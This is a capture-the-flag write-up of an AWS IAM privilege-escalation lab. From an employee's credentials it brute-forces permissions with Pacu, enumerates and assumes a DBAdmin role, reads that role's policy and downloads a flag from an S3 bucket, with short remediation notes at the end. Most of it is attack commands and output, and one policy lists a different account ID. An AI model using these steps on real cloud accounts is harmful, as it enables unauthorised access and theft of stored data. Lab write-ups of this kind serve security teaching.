Trust Me WriteUp

Welcome to Secure Corp,A leading organization with a growing cloud infrastructure. Recently, a security audit raised concerns about potential misconfigurations in IAM roles and permissions. As a Red Team Specialist, your mission is to investigate IAM permissions, uncover vulnerabilities in the trust relationship of IAM roles, and exploit them to escalate privileges.

Your initial foothold? You’ve gained access to an employee’s AWS credentials. Can you use them to pivot, escalate privileges, and retrieve the flag hidden inside an S3 bucket?

Initial Access:

You start the challenge with the AWS credentials of an employee user. Your objective is to investigate IAM roles, identify misconfigurations, assume a privileged role, and retrieve the hidden flag.

AWS Resources:

Organization have - Users, Roles and Policies to manage the workflow, S3 Bucket to store data.

Attack Flow

---

This detailed write-up demonstrates IAM privilege escalation through misconfigured role trust relationships. Starting from compromised employee credentials, systematic enumeration reveals assumable roles, leading to S3 data access and flag retrieval.

Complete Attack Steps with Commands

1. Initial Access & Whoami

$ aws configure --profile Track_Me
AWS Access Key ID [None]: [REDACTED_AWS_ACCESS_KEY_ID]
AWS Secret Access Key [None]: [REDACTED_AWS_SECRET_ACCESS_KEY]
Default region name [None]: us-east-1
Default output format [None]: json

1.1 Validate identity

$ aws sts get-caller-identity --profile Track_Me
{
    "UserId": "[REDACTED_AWS_USERID]",
    "Account": "058264439561",
    "Arn": "arn:aws:iam::058264439561:user/Backend_Developer"
}

2. Bruteforce Permissions (Pacu)

Pacu (trace:imported-Trust_Me) > run iam__bruteforce_permissions
Running module iam__bruteforce_permissions...
[iam__bruteforce_permissions] Enumerated IAM Permissions:
[iam__bruteforce_permissions] Enumerating us-east-1
2025-11-28 13:08:57,972 - 6811 - [INFO] Starting permission enumeration for access-key-id "[REDACTED_AWS_ACCESS_KEY_ID]"
2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account ARN : arn:aws:iam::058264439561:user/Backend_Developer
2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account Id : 058264439561
2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account Path: user/Backend_Developer
2025-11-28 13:08:59,863 - 6811 - [INFO] Attempting common-service describe / list brute force.
2025-11-28 13:09:04,387 - 6811 - [ERROR] Remove globalaccelerator.describe_accelerator_attributes action
2025-11-28 13:09:09,750 - 6811 - [ERROR] Remove codedeploy.get_deployment_target action
2025-11-28 13:09:09,751 - 6811 - [ERROR] Remove codedeploy.batch_get_deployment_targets action
2025-11-28 13:09:11,960 - 6811 - [ERROR] Remove codedeploy.list_deployment_targets action
2025-11-28 13:09:14,377 - 6811 - [INFO] -- dynamodb.describe_endpoints() worked!
2025-11-28 13:09:14,461 - 6811 - [INFO] -- sts.get_session_token() worked!
2025-11-28 13:09:14,751 - 6811 - [INFO] -- sts.get_caller_identity() worked!

Key Findings:

• dynamodb.describe_endpoints()
• sts.get_session_token()
• sts.get_caller_identity()

3. Enumerate Assumable Roles

python3 assume_role_enum.py -p Trust_Me -i 058264439561 -w wordlist.txt
Targeting account ID: 058264439561

Starting role enumeration...

{
"Credentials": {
"AccessKeyId": "[REDACTED_AWS_ACCESS_KEY_ID]",
"SecretAccessKey": "[REDACTED_AWS_SECRET_ACCESS_KEY]",
"SessionToken": "[REDACTED_AWS_SESSION_TOKEN]",
"Expiration": "[REDACTED]"
},
"AssumedRoleUser": {
"AssumedRoleId": "[REDACTED]",
"Arn": "[REDACTED]"
}
}

Output: Discovered DBAdmin role assumable by current user.

4. Assume DBAdmin Role

Temporary credentials received:

Create profile:

aws configure --profile DBadmin set aws_access_key_id [REDACTED_AWS_ACCESS_KEY_ID]
aws configure --profile DBadmin set aws_secret_access_key [REDACTED_AWS_SECRET_ACCESS_KEY]
aws configure --profile DBadmin set aws_session_token [REDACTED_AWS_SESSION_TOKEN]

5. Enumerate DBAdmin Role Policies

$ aws iam list-attached-role-policies --role-name DBAdmin --profile DBadmin

Output:

{
    "AttachedPolicies": [{
        "PolicyName": "Manager_Access_S3",
        "PolicyArn": "arn:aws:iam::058264439561:policy/Manager_Access_S3"
    }]
}

6. Inspect Manager_Access_S3 Policy

$ aws iam get-policy-version --policy-arn arn:aws:iam::058264439561:policy/Manager_Access_S3 --version-id v1 --profile DBadmin
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::securecorpbakstoragebuk",
"arn:aws:s3:::securecorpbakstoragebuk/*"
]
},
{
"Action": [
"iam:ListAttachedRolePolicies",
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "arn:aws:iam::999909936336:role/DBAdmin"
},
{
"Action": [
"iam:GetPolicy",
"iam:GetPolicyVersion"
],
"Effect": "Allow",
"Resource": "arn:aws:iam::999909936336:policy/Manager_Access_S3"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2024-09-19T12:31:43+00:00"
}
}

Key Permissions Found:

• s3:GetObject on arn:aws:s3:::securecorpbakstoragebuk/*
• s3:ListBucket on arn:aws:s3:::securecorpbakstoragebuk

7. List S3 Bucket Contents

$ aws s3 ls s3://securecorpbakstoragebuk/ --profile DBadmin
2024-09-19 18:01:57 28 Flag.txt

• Found the Flag and lets download

8. Retrieve Flag

$ aws s3 cp s3://securecorpbakstoragebuk/Flag.txt . --profile DBadmin
download: s3://securecorpbakstoragebuk/Flag.txt to ./Flag.txt
$ cat Flag.txt
[REDACTED_FLAG]

Flag: [REDACTED_FLAG]

Remediation Steps

• Trust Policy Misconfiguration: DBAdmin role trust allowed assumption by Backend_Developer.
• Defense: Implement MFA conditions, source IP restrictions, and monitor AssumeRole events.